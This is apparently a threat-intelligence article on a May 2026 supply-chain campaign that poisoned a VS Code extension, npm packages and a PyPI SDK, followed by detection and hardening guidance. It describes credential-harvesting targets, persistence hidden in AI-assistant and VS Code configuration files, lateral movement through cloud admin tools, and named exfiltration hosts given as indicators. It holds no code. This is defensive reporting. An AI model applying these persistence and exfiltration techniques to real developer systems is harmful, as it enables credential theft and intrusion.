The modern AI development ecosystem represents an unprecedented concentration of high-value targets. When attackers compromise a single developer at OpenAI, Grafana Labs, or Mistral AI—as TeamPCP demonstrated this week—they gain access to code that will be deployed across thousands of downstream organizations. These developers hold the keys to tomorrow's critical infrastructure: the models, APIs, and tools that power everything from customer service chatbots to autonomous vehicle systems. (Source: Isc)

The economics are brutally efficient. Rather than targeting 10,000 individual companies, attackers compromise one popular development tool and wait for it to propagate. When TeamPCP poisoned the Nx Console VS Code extension with its 2.2 million installs, the malicious code auto-updated onto developer machines at GitHub, OpenAI, and other AI labs within 18 minutes. Each infected developer workstation became a gateway to internal repositories, cloud credentials, and production deployment pipelines.

Supply chain compromise in practice looks deceptively legitimate. A developer opens Visual Studio Code on Monday morning, and their Nx Console extension auto-updates—complete with the verified publisher badge. They import Microsoft's official durabletask Python SDK for their Azure Functions project, unaware that versions 1.4.1 through 1.4.3 contain credential-stealing code. They install echarts-for-react from npm, seeing the Sigstore verification badge that suggests safety. In each case, the malicious code executes during normal development workflows, harvesting AWS keys, GitHub tokens, and Kubernetes service accounts before the developer writes their first line of code for the day.

AI and machine learning developers present unique value to attackers beyond traditional software teams. Their workstations typically contain access tokens for expensive GPU clusters, training datasets worth millions in compute time, and pre-release models that represent months of research. More critically, these developers often have elevated permissions across cloud environments to manage the massive infrastructure required for model training. A single compromised ML engineer credential can provide access to hundreds of thousands of dollars in cloud resources per day.

TeamPCP's technical approach exploits the trust relationships that make modern development possible. The campaign weaponizes OIDC credentials from one breach to publish malicious packages in another, creating a self-sustaining cycle. The TanStack credentials harvested on May 11 enabled the Nx Console publication on May 18, which then exfiltrated credentials from GitHub's internal systems. Those credentials, in turn, could enable future attacks across any repository those GitHub employees could access.

The framework now operates across three package ecosystems simultaneously—npm, PyPI, and Visual Studio Marketplace—with each compromise feeding the next. The roughly 499 KB obfuscated JavaScript payload in the @antv packages harvests more than 20 credential types, while the Python variants reportedly include a Linux disk wiper capable of destroying entire development environments. The persistence mechanisms hide in AI coding assistant configuration files like ~/.claude/settings.json and .vscode/tasks.json, ensuring the malware survives system reboots and continues harvesting fresh credentials as developers rotate them.

The public release of the Shai-Hulud framework source code on GitHub fundamentally changes the threat landscape. Within hours of publication, copycat operators had forked the repository and begun their own campaigns. The modular TypeScript/Bun toolkit provides everything needed for supply chain attacks: credential harvesting modules, package poisoning automation, and encrypted exfiltration to Session messenger endpoints. The framework even includes helpful instructions to "Change keys and C2 as needed," lowering the technical barrier for aspiring attackers.

The Attack Chain: From VS Code Extension to Production Code

The attack begins with a deceptively simple mechanism: automatic updates. When the malicious Nx Console extension version 18.95.0 hit the Visual Studio Marketplace on May 18, it carried the verified-publisher badge from nrwl.angular-console—a trusted name with 2.2 million installations. Developer workstations configured for auto-updates pulled the poisoned version within the 18-minute window before removal, executing malicious code with the full permissions of the VS Code environment.

VS Code extensions operate with extraordinary privilege levels that most developers never consider. Extensions can read and modify any file in your workspace, execute shell commands, access environment variables containing API keys and tokens, and interact with integrated terminals where developers authenticate to production systems. The extension API provides direct access to workspace configuration files, Git repositories, and debugging sessions—essentially granting complete visibility into a developer's daily workflow and the secrets they handle.

The TeamPCP operators weaponized these permissions through their Mini Shai-Hulud payload, a roughly 499 KB obfuscated JavaScript module that executes during package installation. The payload harvests more than 20 credential classes simultaneously: GitHub and npm tokens with write permissions, AWS access keys, GCP and Azure service accounts, SSH private keys, Kubernetes configurations, HashiCorp Vault tokens, Stripe API keys, and password manager vaults from 1Password and Bitwarden. This breadth of collection transforms a single compromised developer endpoint into a gateway for lateral movement across entire cloud infrastructures.

CVE-2026-45321 represents the critical enabler for this campaign's multi-stage architecture. The vulnerability allows attackers to abuse OIDC token generation in CI/CD pipelines, harvesting credentials that maintain publisher rights across multiple package ecosystems. TeamPCP demonstrated this by using credentials stolen from the May 11 TanStack compromise to publish the malicious Nx Console build a week later—proving they can chain compromises across time and platforms to amplify their reach.

The persistence mechanism reveals sophisticated operational planning. Rather than relying on traditional malware techniques that security tools monitor, the Shai-Hulud framework writes to .vscode/tasks.json and ~/.claude/settings.json—configuration files that developers and security teams rarely inspect. These files execute on every VS Code launch or AI assistant invocation, re-establishing the compromise even after credential rotation or system reimaging. The framework maintains its foothold through the very tools developers trust most.

The durabletask SDK compromise demonstrates how this attack chain extends beyond JavaScript ecosystems. The trojanized Python package versions 1.4.1 through 1.4.3 injected malicious code directly into source files, meaning a simple import statement triggered execution. The second-stage payload reportedly includes a Linux disk wiper alongside its credential harvesting capabilities, escalating from espionage to potential destruction. Within cloud environments, the malware propagates using legitimate administrative tools: AWS Systems Manager for EC2 instances and kubectl exec for Kubernetes clusters, making detection extraordinarily difficult.

The framework's modular TypeScript/Bun architecture, now publicly available on GitHub, enables rapid adaptation to new targets. Operators can swap credential extraction modules, modify exfiltration endpoints to Session messenger domains like filev2.getsession.org, or add support for additional package ecosystems without rewriting core functionality. The appearance of copycat forks within hours of the source code publication signals that this attack methodology will proliferate beyond TeamPCP's original operations.

Immediate Detection and Containment Actions

Security teams face a critical detection window measured in minutes, not hours. The TeamPCP campaign demonstrates that malicious packages can execute during installation—before traditional endpoint protection even recognizes a threat exists. Your immediate priority is identifying whether the three specific attack vectors touched your environment during their brief exposure windows.

Today's Critical Actions

Check every developer workstation for the presence of ~/.claude/settings.json and examine .vscode/tasks.json for unexpected entries. These persistence mechanisms execute on every VS Code launch and Claude Desktop startup, maintaining backdoor access even after removing infected packages. The campaign specifically targets these configuration files because developers rarely audit them.

Query your package manager logs for installations between May 18-19, 2026. Look specifically for npm install commands that pulled any @antv/* packages, particularly versions published by the "atool" maintainer account. The malicious JavaScript payload executes during the installation phase itself—if these packages touched your CI/CD runners, those environments are compromised regardless of whether the packages remain installed.

Search process lists for connections to filev2.getsession.org and seed1.getsession.org. These Session messenger endpoints receive exfiltrated credentials in encrypted form. Active connections indicate ongoing data theft that requires immediate network isolation.

This Week's Containment Priorities

Deploy VS Code extension allowlisting through your device management platform. Create a extensions.json file in your workspace root with only explicitly approved extensions. The verified-publisher badge proved meaningless when legitimate accounts published malicious builds—allowlisting remains your only reliable control.

Scan all Python environments for durabletask versions 1.4.1, 1.4.2, or 1.4.3 using pip list | grep durabletask. These versions contained the disk wiper payload that executes on import. Check your PyPI cache servers and artifact repositories—cached copies continue spreading the infection even after PyPI yanked the versions.

Audit AWS SSM session history and Kubernetes kubectl exec logs for the May 18-24 window. The worm component uses these legitimate administrative channels to spread laterally through cloud infrastructure. Look for exec commands originating from service accounts that shouldn't have cluster-admin privileges.

Sustainable Detection Infrastructure

Implement runtime monitoring on developer workstations using osquery or similar tools. Monitor file writes to VS Code and AI assistant configuration directories, flagging any modifications to tasks.json, settings.json, or keybindings.json that occur outside normal IDE operations.

Configure your SIEM to alert on npm registry API calls that bypass your corporate proxy. The campaign's credential harvesting targets npm tokens with write permissions and 2FA bypass capabilities—direct registry connections from developer machines indicate either compromised credentials in use or active exfiltration attempts.

Establish cryptographic verification for all package installations. Generate and store SHA-256 hashes of your approved package versions, then enforce hash verification in your CI/CD pipelines. The campaign's ability to forge Sigstore badges means visual verification provides zero security value—only cryptographic proofs matter.

Supply Chain Defense: Protecting AI/ML Development Pipelines

The TeamPCP campaign exposes a fundamental weakness in AI/ML development pipelines: the implicit trust placed in package management systems and development tools. Traditional security models assume threats come from outside the perimeter, but when developers at GitHub, OpenAI, and Mistral AI installed compromised packages directly into their development environments, perimeter defenses became irrelevant.

Modern AI/ML projects compound this risk through their unique dependency patterns. A typical machine learning project pulls from PyPI for core frameworks, npm for visualization tools, and potentially conda for specialized scientific computing libraries. Each ecosystem operates with different security models, verification mechanisms, and update cadences. When TeamPCP simultaneously targeted all three ecosystems—poisoning durabletask on PyPI, the @antv ecosystem on npm, and the Nx Console extension in the VS Code Marketplace—they exploited this fragmentation.

Dependency Verification for AI/ML Projects

Machine learning teams must implement multi-layered verification that goes beyond simple version pinning. Start by establishing a private package registry that acts as a controlled gateway between public repositories and your development environment. Tools like Artifactory or Nexus Repository can cache approved versions while blocking unapproved updates.

Configure your package managers to verify cryptographic signatures at installation time. For Python environments, enable pip's hash-checking mode by adding --require-hashes to all installation commands. This forces pip to verify that downloaded packages match predetermined SHA256 hashes, preventing substitution attacks even if an attacker compromises the package repository.

For npm dependencies critical to AI/ML visualization and tooling, implement npm audit signatures as a mandatory pre-installation step. However, the campaign's use of forged Sigstore badges demonstrates that visual verification indicators cannot be trusted. Instead, maintain a cryptographically signed allowlist of package hashes that gets updated only through a formal review process.

VS Code Extension Vetting Process

Development teams need a formal approval workflow before any VS Code extension enters the organizational environment. Create a staging environment where new extensions undergo a 72-hour observation period. During this window, monitor the extension's behavior using Process Monitor on Windows or dtrace on macOS to capture file system access, network connections, and process spawning.

Implement extension installation through group policy or managed deployment rather than allowing developers to install directly from the marketplace. Microsoft's Group Policy templates for VS Code enable administrators to define allowed extension lists and block marketplace access entirely. For AI/ML teams that require flexibility, establish a rapid approval process where security teams can analyze and approve extensions within 24 hours of request.

Behavioral Monitoring in Development Environments

Deploy endpoint detection specifically tuned for developer workstation patterns. Unusual network connections from VS Code, Python interpreters, or Node.js processes should trigger immediate alerts. Monitor for connections to Session messenger infrastructure, unexpected PBKDF2 operations in JavaScript contexts, or new files appearing in ~/.config directories during package installation.

Track package installation velocity as an anomaly indicator. If a developer workstation suddenly installs hundreds of npm packages in rapid succession—as would occur during a Shai-Hulud worm execution—this should trigger automatic network isolation. Similarly, monitor for credential file access patterns; legitimate development rarely requires reading from password manager vaults during package installation.

CI/CD Pipeline Hardening

Isolate build environments from developer workstations entirely. Use ephemeral build agents that spin up fresh for each build, pull dependencies from your private registry, and terminate immediately after completion. This prevents persistence mechanisms from surviving between builds and limits the blast radius of any single compromise.

Assessing Your Organization's Exposure

Your organization's risk exposure to the TeamPCP campaign depends on three interconnected factors that most security assessments overlook: developer autonomy, credential scope, and recovery time objectives. The campaign's success against GitHub, OpenAI, and Mistral AI reveals that traditional vulnerability management approaches fail when developers themselves become the attack surface.

Start by mapping your developer population against their actual tool usage patterns. How many of your developers run VS Code? Among those, what percentage have administrative control over their extension installations? The distinction matters because TeamPCP specifically exploits the gap between corporate policy and developer practice.

Most organizations discover they have no visibility into which extensions developers have installed, when they installed them, or whether auto-update is enabled. This blind spot becomes critical when considering that a developer at GitHub pulled the malicious Nx Console extension during an 18-minute window and subsequently exposed 3,800 internal repositories.

The credential multiplication problem defines your actual blast radius. A single developer workstation typically holds credentials for multiple environments: local development, staging, production, cloud providers, container registries, and package repositories. When TeamPCP compromises that workstation, it harvests all accessible credentials simultaneously—not just the ones actively in use.

Consider your AI/ML teams specifically. These developers often require broader access than traditional software engineers: they need production data for model training, compute resources across multiple cloud providers, and access to sensitive datasets that inform model behavior. Their workstations represent concentrated risk that standard developer security models don't account for.

The Python ecosystem presents unique assessment challenges. Your data scientists likely mix pip, conda, and poetry installations across different projects. Each package manager maintains separate credential stores and configuration files. When the campaign trojanized Microsoft's durabletask SDK, any environment that imported it—including Jupyter notebooks and research environments—became compromised.

Evaluate your organization's dependency refresh patterns. How frequently do your CI/CD pipelines pull fresh packages? Do you use version pinning, or do you accept minor version updates automatically? The 35-minute window for the durabletask compromise and 18-minute window for Nx Console mean that even conservative update policies could have pulled malicious versions.

Business continuity planning must account for developer workstation compromise as a production incident. If a developer's machine is compromised on a Friday afternoon, can you revoke all their credentials before Monday morning? The answer determines whether a workstation infection becomes a production breach.

Your incident response runbooks probably address server compromises and data breaches, but do they cover scenarios where the development environment itself is hostile? Can you rebuild a developer's workspace from known-good sources? How long would it take to re-establish trust in your development pipeline after discovering malicious packages in your dependency tree?

The framework source code publication changes risk calculations fundamentally. Now any script kiddie can deploy TeamPCP's tools with minimal modification. Your exposure assessment must assume that multiple unrelated actors might target your developers simultaneously using identical techniques but different infrastructure.

Risk prioritization starts with identifying which teams, if compromised, would cause maximum damage. Typically these are platform teams with infrastructure access, ML engineers with training data access, and DevOps engineers with deployment permissions. These populations need enhanced monitoring regardless of your overall security posture.